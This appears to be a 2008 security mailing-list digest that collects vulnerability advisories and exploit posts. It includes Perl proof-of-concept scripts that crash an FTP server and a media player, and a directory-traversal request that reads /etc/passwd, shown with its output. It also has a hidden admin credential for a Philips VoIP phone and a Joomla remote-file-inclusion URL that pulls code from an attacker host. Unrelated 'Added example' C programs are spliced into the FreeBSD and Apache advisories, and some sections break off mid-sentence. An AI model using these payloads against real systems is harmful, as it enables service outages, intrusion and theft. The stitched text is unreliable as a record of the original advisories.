UniversalFtp Server 1.0.44 Multiple Remote Denial of service

2008-02-14 Thread securfrog
# UniversalFtp Server 1.0.44 Multiple Remote Denial of service

#

[EMAIL PROTECTED]: This bug has been found with a brain, ten fingers, a keyboard, and a laptop, one of the best tools I ever tried. Stay tuned for more tool hints.

#

# 

# Response:  226 Completed...

# Status:    Directory listing completed

# Command:   LIST aa.. .
...

# Response:  150 Directory...

# Status:    ftpcontrolsocket.cpp(1764): Waiting for replies to skip before sending next command...   caller=0p12e69f8  --> 0_o

# 

# Vulnerable commands: CWD (2 A), LIST (4102 A), PORT (2 A)

#

#

# PoC :

use strict;
use warnings;
use Net::FTP;

# The target host is the only argument.
my $target = $ARGV[0] or die "usage: $0 <target>\n";

my $user = "anonymous";

my $pass = "something";

print "Trying to connect to: $target...\n";

my $ftp = Net::FTP->new($target, Debug => 0, Port => 21)
    or die "could not connect: $@\n";

print "Connected!\n";

$ftp->login($user, $pass) or warn "login failed: ", $ftp->message;

# The malformed CWD argument that crashes the server (see the list of vulnerable commands above).
$ftp->cwd("AA");

print "PoC successful, the server should be down now\n";

$ftp->quit;


DOINGSOFT-2008-02-11-002 IP Diva VPN SSL many XSS attacks

2008-02-14 Thread eagle

ID : DOINGSOFT-2008-02-11-002

Discovered : 15/10/2007

Corrected : not known, the vendor has not responded to mail since
December 2007


Publication :11/02/2008

Credits : Ha.ckers.fr Team

Affected Software  : IPDiva VPNSSL

Versions  :

* 2.2 branch < 2.2.8.84
* 2.3 branch < 2.3.2.14

Vulnerability :  XSS vulnerability

Description : The IPDiva Mediation server suffers from many XSS
vulnerabilities. A simple vector such as alert("Tested by
Ha.ckers.fr Team"); works, for example...


Re: UniversalFtp Server 1.0.44 Multiple Remote Denial of service

There's already an advisory for Universalftp:


http://milw0rm.com/exploits/2787


But there are a couple more vulnerable FTP commands added in this one.


Regards



PlutoStatus Locator v1.0pre (alpha) local file inclusion vulnerability


download: http://sourceforge.net/projects/plutostatus/

author: muuratsalo
contact: muuratsalo[at]gmail.com

exploit:
http://localhost/locator/index.php?page=../../../../../../../../../../etc/passwd%00


Rosoft Media Player 4.1.8 Buffer Overflow ( .M3U)



#Rosoft Media Player  4.1.8 Buffer Overflow (.M3U)

#

# @nolife : Pow...Pow... If you are kind I'll show you my set of super mega tools, fuzzers, and all the automated stuff I use for M3U/ASX/PLS. Pow..Pow...

# Nolifing is actually a disease... Do not be mean with nolifes

#

#

#   eax=41414141 ebx=41414141 ecx= edx=00ba9078 esi=0012eb7c edi=00ba9078

#   eip=00403b9c esp=0012eb4c ebp=0012fb80 iopl=0 nv up ei pl nz na pe nc

#   cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010206

#   RosoftMediaPlayerFree+0x3b9c:

#   00403b9c 8b10            mov     edx,dword ptr [eax]  ds:0023:41414141=

#

#

use strict;
use warnings;

# 4104 bytes of filler; the crash above shows eax=41414141 once the playlist is loaded.
my $chars = "A" x 4104;

my $file = "I_Shot_The_Nolife.m3u";

# Create (truncate) the playlist instead of appending to a stale copy.
open(my $FILE, ">", $file) or die "Cannot open $file: $!";

print $FILE $chars;

close($FILE);

print "$file has been created\n";

print "Credits: Securfrog\n";



DOINGSOFT-2008-02-11 - IPDiva VPN SSL Brute force attack


ID : DOINGSOFT-2008-02-11-001


Discovered : 15/10/2007
-
Corrected : 15/11/2007

Publication :11/02/2008

Affected Software  : IPDiva VPNSSL
Versions  :
 Users who authenticate with login and password without an OTP system
* 2.2 branch < 2.2.8.84
* 2.3 branch < 2.3.2.14
---
Vulnerability :  Brute force attack

Description :
The IPDiva Mediation server suffers from a cookie exploitation
vulnerability. A mechanism limiting the number of bad login/password
attempts exists, based on a cookie. When the cookie is null, the account
is blocked. By modifying the cookie to a value like 4242, we can try an
unlimited number of connections if the cookie is reset when it reaches 2


FreeBSD Security Advisory FreeBSD-SA-08:04.ipsec

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

=
FreeBSD-SA-08:04.ipsec  Security Advisory
  The FreeBSD Project

Topic:  IPsec null pointer dereference panic

Category:   core
Module: ipsec
Announced:  2008-02-14
Credits:Takashi Sogabe, Tatuya Jinmei
Affects:FreeBSD 5.5
Corrected:  2008-02-14 11:49:39 UTC (RELENG_5, 5.5-STABLE)
2008-02-14 11:50:28 UTC (RELENG_5_5, 5.5-RELEASE-p19)
CVE Name:   CVE-2008-0177

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.

I.   Background

The IPsec suite of protocols provide network level security for IPv4
and IPv6 packets.  FreeBSD includes software originally developed by
the KAME project which implements the various protocols that make up
IPsec.

II.  Problem Description

There is an improper reference to a data structure in the processing of
IPsec packets, which can result in a NULL pointer being dereferenced.

III. Impact

A single specifically crafted IPv6 packet could cause the kernel to panic,
when the kernel had been configured to process IPsec and IPv6 traffic.

This requires IPSEC to be compiled into the kernel, it does not necessarily
have to be configured at that point.

IV.  Workaround

No workaround is available, but kernels which do not include IPsec
support are not vulnerable.  The GENERIC and SMP kernel configurations
distributed with FreeBSD releases do not include IPsec support.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 5-STABLE, or to the RELENG_5_5
security branch dated after the correction date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 5.5 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch http://security.FreeBSD.org/patches/SA-08:04/ipsec.patch
# fetch http://security.FreeBSD.org/patches/SA-08:04/ipsec.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch                                                           Revision
  Path
- -------------------------------------------------------------------------
RELENG_5
  src/sys/netinet6/ipcomp_input.c                                 1.7.4.2
RELENG_5_5
  src/UPDATING                                             1.342.2.35.2.20
  src/sys/conf/newvers.sh                                   1.62.2.21.2.21
  src/sys/netinet6/ipcomp_input.c                             1.7.4.1.4.1
- -------------------------------------------------------------------------

VII. References

http://www.kb.cert.org/vuls/id/110947
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0177

The latest revision of this advisory is available at
http://security.FreeBSD.org/advisories/FreeBSD-SA-08:04.ipsec.asc
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (FreeBSD)

iD8DBQFHtC0HFdaIBMps37IRAt5gAKCGnYEX3r7n0Dsypmfv2m1J9pgICwCfd6uH
Gy2w6OYNovnfrb7EN0jWCjM=
=jHy3
-END PGP SIGNATURE-


FreeBSD Security Advisory FreeBSD-SA-08:03.sendfile

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

=
FreeBSD-SA-08:03.sendfile   Security Advisory
  The FreeBSD Project

Topic:  sendfile(2) write-only file permission bypass

Category:   core
Module: sys_kern
Announced:  2008-02-14
Credits:Kostik Belousov
Affects:All supported versions of FreeBSD
Corrected:  2008-02-14 11:45:00 UTC (RELENG_7, 7.0-PRERELEASE)
2008-02-14 11:45:41 UTC (RELENG_7_0, 7.0-RELEASE)
2008-02-14 11:46:08 UTC (RELENG_6, 6.3-STABLE)
2008-02-14 11:46:41 UTC (RELENG_6_3, 6.3-RELEASE-p1)
2008-02-14 11:47:06 UTC (RELENG_6_2, 6.2-RELEASE-p11)
2008-02-14 11:47:39 UTC (RELENG_6_1, 6.1-RELEASE-p23)
2008-02-14 11:49:39 UTC (RELENG_5, 5.5-STABLE)
2008-02-14 11:50:28 UTC (RELENG_5_5, 5.5-RELEASE-p19)
CVE Name:   CVE-2008-0777

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.

I.   Background

The sendfile(2) system call allows a server application (such as a
HTTP or FTP server) to transmit the contents of a file over a network
connection without first copying it to application memory.  High
performance servers such as the Apache HTTP Server and ftpd use sendfile.

II.  Problem Description

When a process opens a file (and other file system objects, such as
directories), it specifies access flags indicating its intent to read,
write, or perform other operations.  These flags are checked against
file system permissions, and then stored in the resulting file
descriptor to validate future operations against.

The sendfile(2) system call does not check the file descriptor access
flags before sending data from a file.

III. Impact

If a file is write-only, a user process can open the file and use
sendfile to send the content of the file over a socket, even though the
user does not have read access to the file, resulting in possible
disclosure of sensitive information.
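
Added example, not part of the FreeBSD advisory: a small C regression check
for the write-only bypass described above. It writes a temporary file,
reopens it O_WRONLY, and asks the kernel to sendfile() it across a local
socketpair. A kernel that checks the descriptor's access flags must refuse
with EBADF; a vulnerable one transmits the bytes, which the check reads back
to prove the leak. The file path, the socketpair transport and the "secret"
content are constructed here; the wrapper covers both the FreeBSD sendfile(2)
signature and the Linux one, whose argument order differs.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#if defined(__FreeBSD__)
#include <sys/uio.h>       /* FreeBSD sendfile(2) is declared here */
#else
#include <sys/sendfile.h>  /* Linux variant: different argument order */
#endif

/* Hide the two calling conventions. Returns 0 on success, -1 with errno set. */
static int sendfile_wrap(int sock, int file, size_t len)
{
#if defined(__FreeBSD__)
    off_t sent = 0;
    return sendfile(file, sock, 0, len, NULL, &sent, 0);
#else
    return sendfile(sock, file, NULL, len) < 0 ? -1 : 0;
#endif
}

/*
 * Returns  1 if the kernel refused with EBADF (access flags were checked),
 *          0 if the file content crossed the socket (vulnerable kernel),
 *         -1 if the check could not be set up (errno describes why).
 */
int sendfile_writeonly_check(void)
{
    static const char secret[] = "constructed secret content\n";
    const size_t slen = sizeof secret - 1;
    char path[] = "/tmp/sendfile_wo_XXXXXX";
    int sv[2] = { -1, -1 };
    int fd, result = -1;

    fd = mkstemp(path);
    if (fd < 0) {                      /* no usable /tmp: fall back to the cwd */
        strcpy(path, "sendfile_wo_XXXXXX");
        fd = mkstemp(path);
        if (fd < 0)
            return -1;
    }
    if (write(fd, secret, slen) != (ssize_t)slen)
        goto out;
    close(fd);

    /* Re-open write-only: this descriptor carries no read permission. */
    fd = open(path, O_WRONLY);
    if (fd < 0)
        goto out;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
        goto out;

    if (sendfile_wrap(sv[0], fd, slen) < 0) {
        result = (errno == EBADF) ? 1 : -1;
    } else {
        /* The kernel sent it anyway: confirm the bytes really leaked. */
        char buf[64] = { 0 };
        ssize_t n = read(sv[1], buf, sizeof buf - 1);
        result = (n == (ssize_t)slen && memcmp(buf, secret, slen) == 0) ? 0 : -1;
    }

out:
    if (fd >= 0) close(fd);
    if (sv[0] >= 0) close(sv[0]);
    if (sv[1] >= 0) close(sv[1]);
    unlink(path);
    return result;
}

int main(void)
{
    int r = sendfile_writeonly_check();
    if (r == 1)
        puts("OK: sendfile() on a write-only descriptor was refused with EBADF");
    else if (r == 0)
        puts("VULNERABLE: file content was transmitted from a write-only descriptor");
    else
        perror("check could not run");
    return r == 1 ? 0 : 1;
}
```

Run it as any user: it does not need a write-only file owned by someone else,
because the kernel's check is on the descriptor's open mode, not on file
permissions. Exit status 0 means the kernel refused the transfer.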

IV.  Workaround

No workaround is available, but systems are only vulnerable if
write-only files exist, which are not widely used.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to 5-STABLE, 6-STABLE, or
7.0-PRERELEASE, or to the RELENG_7_0, RELENG_6_3, RELENG_6_2,
RELENG_6_1, or RELENG_5_5 security branch dated after the correction
date.

2) To patch your present system:

The following patches have been verified to apply to FreeBSD 5.5, 6.1,
6.2, 6.3, and 7.0 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 6.2, 6.3, and 7.0]
# fetch http://security.FreeBSD.org/patches/SA-08:03/sendfile.patch
# fetch http://security.FreeBSD.org/patches/SA-08:03/sendfile.patch.asc

[FreeBSD 6.1]
# fetch http://security.FreeBSD.org/patches/SA-08:03/sendfile61.patch
# fetch http://security.FreeBSD.org/patches/SA-08:03/sendfile61.patch.asc

[FreeBSD 5.5]
# fetch http://security.FreeBSD.org/patches/SA-08:03/sendfile55.patch
# fetch http://security.FreeBSD.org/patches/SA-08:03/sendfile55.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch                                                           Revision
  Path
- -------------------------------------------------------------------------
RELENG_5
  src/sys/kern/kern_descrip.c                                  1.243.2.11
RELENG_5_5
  src/UPDATING                                             1.342.2.35.2.20
  src/sys/conf/newvers.sh                                   1.62.2.21.2.21
  src/sys/kern/kern_descrip.c                               1.243.2.9.2.1
RELENG_6
  src/sys/kern/kern_descrip.c                                  1.279.2.16
  src/sys/kern/uipc_syscalls.c                                  1.221.2.5
RELENG_6_3
  src/UPDATING                                              1.416.2.37.2.5
  src/sys/conf/newvers.sh                                    1.69.2.15.2.4
  src/sys/kern/kern_descrip.c                              1.279.2.15.2.1
  src/sys/kern/uipc_syscalls.c                              1.221.2.4.4.1
RELENG_6_2
  src/UPDATING                                             1.416.2.29.2.15
  src/sys/conf/newvers.sh                                   1.69.2.13.2.14
  src/sys/kern/kern_descrip.c                               1.279.2.9.2.1
  src/sys/kern/uipc_syscalls.c                              1.221.2.4.2.1
RELENG_6_1
  src/UPDATING

Philips VOIP841 Multiple Vulnerabilities

Secure Network - Security Research Advisory


Vuln name: Philips VOIP841 Multiple Vulnerabilities

Systems affected: Philips VOIP841, Firmware Version 1.0.4.50 and 1.0.4.80, Web Server Version 1.5 (simple httpd)

Systems not affected: n/a

Severity: High

Local/Remote: Remote

Vendor URL: http://www.consumer.philips.com/consumer

Author(s): Luca "ikki" Carettoni - [EMAIL PROTECTED]

Vendor disclosure: 23rd January 2008

Vendor acknowledged: -

Vendor patch release: -

Public disclosure: 14th February 2008

Advisory number: SN-2008-01

Advisory URL: http://www.securenetwork.it/advisories/, http://www.ikkisoft.com


*** SUMMARY ***


VOIP841 is one of the first DECT cordless phones with an embedded Skype client.
Without a computer, it is possible to call other Skype users directly or international numbers using SkypeOut as well as the regular PSTN line. It is important to notice that it is Skype Certified and presented as a best seller on the "Skype Shop" online.

Multiple vulnerabilities have been found in the latest version of this VOIP phone, ranging from a hidden administration account to XSS and directory traversal. Various consequences are associated with these issues, such as theft of Skype authentication credentials stored in the phone and information disclosure.

In order to exploit some vulnerabilities, a regular user should be authenticated.
However, using the hidden administration account it is possible to easily bypass this security mechanism.


*** VULNERABILITY DETAILS ***


(a) Hidden Administration Account

The device provides a comfortable web management console, protected with a basic HTML Authentication.
The default account is set to "Philips:voip841".

We discovered a hidden administration account which is probably used during technical remote assistance.
In the file "/var/cnxt/service", there is the BASE64 string "c2VydmljZTpzZXJ2aWNl" which represents the account "service:service".

Using these credentials it is possible to log into the web administration console with admin privileges.
The previous user also enables a "secret" tab called [Change MAC Address] where it is possible (as the name implies) to change the hardware address of the network interface.


(b) Directory Listing, Directory Traversal

The embedded webserver doesn't sanitize any kind of user input. The directory listing option is also enabled.
Using the previous account it is possible to browse every directory on the device and to retrieve the content of any file with a simple HTTP request.

Let's see a self-explanatory example:


jungle ikki $ telnet 192.168.1.10 80

Trying 192.168.1.10...

Connected to 192.168.1.10.

Escape character is '^]'.

GET /../../../../../../../../etc/passwd HTTP/1.0

Host: 192.168.1.10

Authorization: Basic c2VydmljZTpzZXJ2aWNl


HTTP/1.0 200 OK

Content-type: text/plain

Expires: Sat, 24 May 1980.7:00:00.GMT

Pragma: no-cache

Server: simple httpd 1.0


root:x:0:0:root:/root:/bin/bash

demo:x:5000:100:Demo User:/home/demo:/bin/bash

nobody:x:65534:65534:Nobody:/htdocs:/bin/bash

Connection closed by foreign host.


(c) Cross Site Scripting (XSS)

Due to the absence of input filters it is possible to inject scripting code inside the standard 404 response page.
In this way it is possible to trigger XSS attacks with a simple HTTP request like the following:


GET /var/htdocs/alert("XSS"); HTTP/1.0

Host: 192.168.1.10


404 File Not Found



httpd server:  The requested URL '/var/htdocs/alert("XSS");' 
was not found on this server.




(d) Insecure Storage

Browsing the device filesystem, we have noticed the presence of sensitive information stored in an insecure way.

Just to show the possible risks, we report the possibility to retrieve the Skype credentials used by the device and entered by the user during the configuration process.
In the file "/var/jffs2/data/save.dat", the embedded Skype client stores temporary information such as the Skype account (username and password) in clear text.

Another issue is related to the change password procedure for the web management console: every operation done on the web console is logged to a temporary file present in the directory "/tmp".
When an administrator changes the web authentication password, the old and the new values are revealed in the file "apply.log" generated by the cgi-bin called "apply".


## CUT HERE ##

<22:02:11.94> apply cgi start...

<22:02:11.94> Content length : 64

<22:02:11.94> 
btn_action=admin&edit_pwd1=ikki&edit_pwd2=ikki&rb_defaults=rb_no

<22:02:11.94> 0 : [btn_action] = [admin]

<22:02:11.94> 1 : [edit_pwd1] = [ikki]

<22:02:11.94> 2 : [edit_pwd2] = [ikki]

<22:02:11.94> 3 : [rb_defaults] = [rb_no]

<22:02:11.94> Action : [4] admin

<22:02:11.94> OldUser:philips:voip841

<22:02:11.94> NewUser:ikki

<22:02:11.94> Encoded:philips:ikki

## CUT HERE ##


*** EXPLOIT ***


Attackers may exploit these issues thr

Joomla 1.0.13 - 1.0.14 / (remote) PHP file inclusion possible if old configuration.php

Affects: Joomla 1.0.13 - 1.0.14
Vulnerability: (remote) PHP file inclusion possible if old
configuration.php
Date: 14-feb-2008
 
Introduction:
 
Remote PHP file inclusion is possible when RG_EMULATION is not defined in
configuration.php. This is typical when upgrading from an older version,
leaving configuration.php untouched. Furthermore, in PHP, register_globals
must be 'off' for this exploit to work.
 
In Joomla >=1.0.13, configuration.php-dist disables register_globals
emulation by defining RG_EMULATION false. In older Joomla versions, this
was defined in globals.php instead.
 
Users upgrading without touching configuration.php (quite typical) will
have RG_EMULATION unset, resulting in the following vulnerability.
 
In Revision 7424 of globals.php, the 'configuration.php' file is included
before registerGlobals() is called, allowing a malicious peer to override
any value set in configuration.php.
 
Details:
 
Since revision 7424, globals.php includes 'configuration.php' if
RG_EMULATION is unset, and enables RG_EMULATION by default for 'old
configuration files':
 
if( defined( 'RG_EMULATION' ) === false ) {
 if( file_exists( dirname(__FILE__).'/configuration.php' ) ) {
  require( dirname(__FILE__).'/configuration.php' );
 }
 
 if( defined( 'RG_EMULATION' ) === false ) {
  // The configuration file is old so default to on
  define( 'RG_EMULATION', 1 );
 }
}
 
The registerGlobals function is called *after* 'configuration.php' has
been included:
 
} else if (ini_get('register_globals') == 0) {
 // php.ini has register_globals = off and emulate = on
 registerGlobals();
 
Maliciously set GET variables cause the variables set by configuration.php
to be overwritten.
 
Looking in index.php:
 
require( 'globals.php' );
require_once( 'configuration.php' );
 
Since 'configuration.php' was already included by globals.php, the
require_once() won't include configuration.php again, leaving the
attacker's values untouched!
 
The exploit:
 
http://joomlasite/index.php?mosConfig_absolute_path=http://malhost/php_script.txt
 
Workaround:
 
In index*.php and administrator/index*.php change:
 
 require_once( 'configuration.php' );
 
to
 
 require('configuration.php');
 
Or disable RG_EMULATION by copying the line from configuration.php-dist
into configuration.php:
 
if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); } // Off by default for security

Regards,


Hendrik-Jan Verheij
BWSS B.V.
 


[USN-578-1] Linux kernel vulnerabilities

=== 
Ubuntu Security Notice USN-578-1  February 14, 2008
linux-source-2.6.15 vulnerabilities
CVE-2006-6058, CVE-2006-7229, CVE-2007-4133, CVE-2007-4997,
CVE-2007-5093, CVE-2007-5500, CVE-2007-6063, CVE-2007-6151,
CVE-2007-6206, CVE-2007-6417, CVE-2008-0001
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  linux-image-2.6.15-51-386                    2.6.15-51.66
  linux-image-2.6.15-51-686                    2.6.15-51.66
  linux-image-2.6.15-51-amd64-generic          2.6.15-51.66
  linux-image-2.6.15-51-amd64-k8               2.6.15-51.66
  linux-image-2.6.15-51-amd64-server           2.6.15-51.66
  linux-image-2.6.15-51-amd64-xeon             2.6.15-51.66
  linux-image-2.6.15-51-hppa32                 2.6.15-51.66
  linux-image-2.6.15-51-hppa32-smp             2.6.15-51.66
  linux-image-2.6.15-51-hppa64                 2.6.15-51.66
  linux-image-2.6.15-51-hppa64-smp             2.6.15-51.66
  linux-image-2.6.15-51-itanium                2.6.15-51.66
  linux-image-2.6.15-51-itanium-smp            2.6.15-51.66
  linux-image-2.6.15-51-k7                     2.6.15-51.66
  linux-image-2.6.15-51-mckinley               2.6.15-51.66
  linux-image-2.6.15-51-mckinley-smp           2.6.15-51.66
  linux-image-2.6.15-51-powerpc                2.6.15-51.66
  linux-image-2.6.15-51-powerpc-smp            2.6.15-51.66
  linux-image-2.6.15-51-powerpc64-smp          2.6.15-51.66
  linux-image-2.6.15-51-server                 2.6.15-51.66
  linux-image-2.6.15-51-server-bigiron         2.6.15-51.66
  linux-image-2.6.15-51-sparc64                2.6.15-51.66
  linux-image-2.6.15-51-sparc64-smp            2.6.15-51.66

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed. If
you use linux-restricted-modules, you have to update that package as
well to get modules which work with the new kernel version. Unless you
manually uninstalled the standard kernel metapackages (e.g. linux-386,
linux-powerpc, linux-amd64-generic), a standard system upgrade will
automatically perform this as well.

Details follow:

The minix filesystem did not properly validate certain filesystem
values. If a local attacker could trick the system into attempting
to mount a corrupted minix filesystem, the kernel could be made to
hang for long periods of time, resulting in a denial of service.
(CVE-2006-6058)

Alexander Schulze discovered that the skge driver does not properly
use the spin_lock and spin_unlock functions. Remote attackers could
exploit this by sending a flood of network traffic and cause a denial
of service (crash). (CVE-2006-7229)

Hugh Dickins discovered that hugetlbfs performed certain prio_tree
calculations using HPAGE_SIZE instead of PAGE_SIZE. A local user
could exploit this and cause a denial of service via kernel panic.
(CVE-2007-4133)

Chris Evans discovered an issue with certain drivers that use the
ieee80211_rx function. Remote attackers could send a crafted 802.11
frame and cause a denial of service via crash. (CVE-2007-4997)

Alex Smith discovered an issue with the pwc driver for certain webcam
devices. A local user with physical access to the system could remove
the device while a userspace application had it open and cause the USB
subsystem to block. (CVE-2007-5093)

Scott James Remnant discovered a coding error in ptrace. Local users
could exploit this and cause the kernel to enter an infinite loop.
(CVE-2007-5500)

Venustech AD-LAB discovered a buffer overflow in the isdn net
subsystem. This issue is exploitable by local users via crafted input
to the isdn_ioctl function. (CVE-2007-6063)

It was discovered that the isdn subsystem did not properly check for
NULL termination when performing ioctl handling. A local user could
exploit this to cause a denial of service. (CVE-2007-6151)

Blake Frantz discovered that when a root process overwrote an existing
core file, the resulting core file retained the previous core file's
ownership. Local users could exploit this to gain access to sensitive
information. (CVE-2007-6206)

Hugh Dickins discovered that when using the tmpfs filesystem, under
rare circumstances, a kernel page may be improperly cleared. A local
user may be able to exploit this and read sensitive kernel data or
cause a denial of service via crash. (CVE-2007-6417)

Bill Roman discovered that the VFS subsystem did not properly check
access modes. A local user may be able to gain removal privileges
on directories. (CVE-2008-0001)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-51.66.diff.gz
  Size/MD5:  2867295 780632d44336275640f237d8c960cd58

http://security.u

Apache web server 2.2: htpasswd predictable salt weakness

Disclaimer:

This is not the first time this issue has been discussed. Andreas
Steinmetz posted about the problem for an Apache httpd release in 2003.
  http://www.securityfocus.com/archive/1/339138
  http://www.securityfocus.com/bid/8707
Philipp Krammer reported that he notified the vendor over five years
ago, in January 2003. http://www.securityfocus.com/archive/1/339163

What's new is
  1) The vendor has released another major version of the 
 affected software, Apache web server 2.2, with the same flaw.
  2) While no official patch is available (due to the vendor's inaction),
 an unofficial patch is now available.

-Peter
http://www.tux.org/~peterw/

Background:

Apache web server supports three different algorithms for 
"encrypted" passwords for HTTP Basic authentication:
 - Unix-style crypt() passwords: uses a 12 bit salt (4096
   possible values) and only the first 8 characters of the 
   cleartext password are used
 - SHA hashes: no salt; any given password can have only one
   {SHA} representation
 - MD5 passwords: based on the BSD MD5 crypt routine, this
   provides for 48 bits of salt, for a theoretical 281 trillion
   (281,474,976,710,656) possible representations of any password

Apache web server includes a command-line utility called 'htpasswd'
for managing the files used for HTTP Basic authentication. It can be 
used (depending on the host OS) to create encrypted passwords with 
any of the supported algorithms. 

Problem:

The htpasswd utility uses predictable salts for the salted algorithms
(Unix-style "CRYPT" and MD5). htpasswd uses the standard C rand()
function to generate "random" salts. In order to use rand(), htpasswd
seeds the random number generator with the srand() function. And that's
where the Apache developers made a critical mistake -- htpasswd 
merely uses the time of day (seconds since the Epoch, time(NULL)) to
seed the random number generator. 

As a result:
 - Salts created by htpasswd are very predictable. 
 - The universe of salts for htpasswd is far less than the MD5 algorithm
   provides for -- 29 bits vs. 48, or 0.000191 percent of the range that
   should be used for MD5.
 - Any passwords encrypted by htpasswd within the same second of
   system clock time will have the same salt, e.g.
  $ htpasswd -nbm user1 pass1; htpasswd -nbm user2 pass2; \
htpasswd -nbm user3 pass2
  user1:$apr1$7jv93/..$2J9qu4mN2zms5O42vw/XE.
  user2:$apr1$7jv93/..$55cRqVaWTSB1YQpeD5uYe0
  user3:$apr1$7jv93/..$55cRqVaWTSB1YQpeD5uYe0
   All three users have the same salt, "7jv93/..", and user2 and user3 
   have the same encrypted password representation. 

Clearly, this is not good.

Furthermore, as you can see in that example, and as Andreas Krennmair
reported to the Apache Group in 2004, the htpasswd utility does not
use the full 48 bits of salt for the MD5 algorithm -- the last two
characters are always "..". So htpasswd creates 36-bit salt strings. 
Given that the srand() problem both reduces the universe to something 
like 29 bits[0] *and* makes the salt highly predictable, this 36-vs-48 
distinction is a moot point -- as long as the srand() seeding is bad.

The problem appears completely contained within the htpasswd utility;
Apache web server handles all properly encrypted passwords as it should.
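
Added example, not the Apache code or the advisory author's patch: a C
re-implementation of the salt derivation described above (srand() seeded
with the current second, one rand() value spread over eight six-bit
characters), the attacker's enumeration of every salt such a tool could have
emitted in a known time window, an audit helper that flags $apr1$ hashes
whose salt ends in "..", and a /dev/urandom replacement that fills all 48
bits. The to64() encoder and its alphabet are the standard crypt(3) ones;
the function names and the audit helper are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

/* The crypt(3)/apr1 salt alphabet: 64 symbols, 6 bits per character. */
static const char itoa64[] =
    "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

/* Encode the low 6*n bits of v, least significant 6 bits first. */
static void to64(char *s, uint64_t v, int n)
{
    while (--n >= 0) {
        *s++ = itoa64[v & 0x3f];
        v >>= 6;
    }
}

/* Weak salt, modelled on the pattern described above: seed with the
   wall-clock second, spread a single rand() value (31 bits at most) over
   8 six-bit characters. Bits 36..47 are always zero, hence the ".." tail. */
void weak_salt(time_t seconds, char out[9])
{
    srand((unsigned)seconds);
    to64(out, (uint64_t)rand(), 8);
    out[8] = '\0';
}

/* Attacker's view: a file generated somewhere in [start, start + window)
   has only 'window' possible salts, one per second, instead of 2^48.
   Fills out[] and returns the count. */
int candidate_salts(time_t start, int window, char (*out)[9])
{
    int i;
    for (i = 0; i < window; i++)
        weak_salt(start + i, out[i]);
    return i;
}

/* Audit helper for existing files: 1 if the line's $apr1$ salt ends in
   "..", 0 if all 8 characters are used, -1 if there is no apr1 hash. */
int apr1_salt_looks_weak(const char *line)
{
    const char *p = strstr(line, "$apr1$");
    if (p == NULL)
        return -1;
    p += 6;
    const char *end = strchr(p, '$');
    if (end == NULL || end - p != 8)
        return -1;
    return (p[6] == '.' && p[7] == '.') ? 1 : 0;
}

/* Replacement generator: 48 fresh bits from the kernel, all 8 characters
   used. Returns 0 on success, -1 if /dev/urandom is unavailable. */
int strong_salt(char out[9])
{
    unsigned char raw[6];
    uint64_t v = 0;
    FILE *f = fopen("/dev/urandom", "rb");
    if (f == NULL || fread(raw, 1, sizeof raw, f) != sizeof raw) {
        if (f != NULL)
            fclose(f);
        return -1;
    }
    fclose(f);
    for (int i = 0; i < 6; i++)
        v = (v << 8) | raw[i];
    to64(out, v, 8);
    out[8] = '\0';
    return 0;
}

int main(void)
{
    /* The two htpasswd lines quoted above: unpatched and patched output. */
    const char *old_line = "user1:$apr1$7jv93/..$2J9qu4mN2zms5O42vw/XE.";
    const char *new_line = "user1:$apr1$wMdual6C$4.JZNIEfbWvF7OKvpsTGO0";
    char a[9], b[9], s[9], cand[5][9];
    time_t now = time(NULL);

    weak_salt(now, a);
    weak_salt(now, b);
    printf("weak salt, same second twice: %s %s\n", a, b);
    int n = candidate_salts(now - 2, 5, cand);
    printf("%d candidate salts for a 5-second window:", n);
    for (int i = 0; i < n; i++)
        printf(" %s", cand[i]);
    printf("\n%s -> weak=%d\n%s -> weak=%d\n", old_line,
           apr1_salt_looks_weak(old_line), new_line, apr1_salt_looks_weak(new_line));
    if (strong_salt(s) == 0)
        printf("strong salt from /dev/urandom: %s\n", s);
    return 0;
}
```

The two htpasswd lines fed to the audit helper are the ones quoted in this
post. Exact salt values depend on the C library's rand(), so the thing to
look at is that two calls in the same second agree and that the trailing ".."
never varies.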

Workarounds:

1) If you are concerned about the possibility of the vastly reduced 
   salt space making your password tables vulnerable to pre-computed
   dictionary attacks, use an updated htpasswd utility to re-encrypt
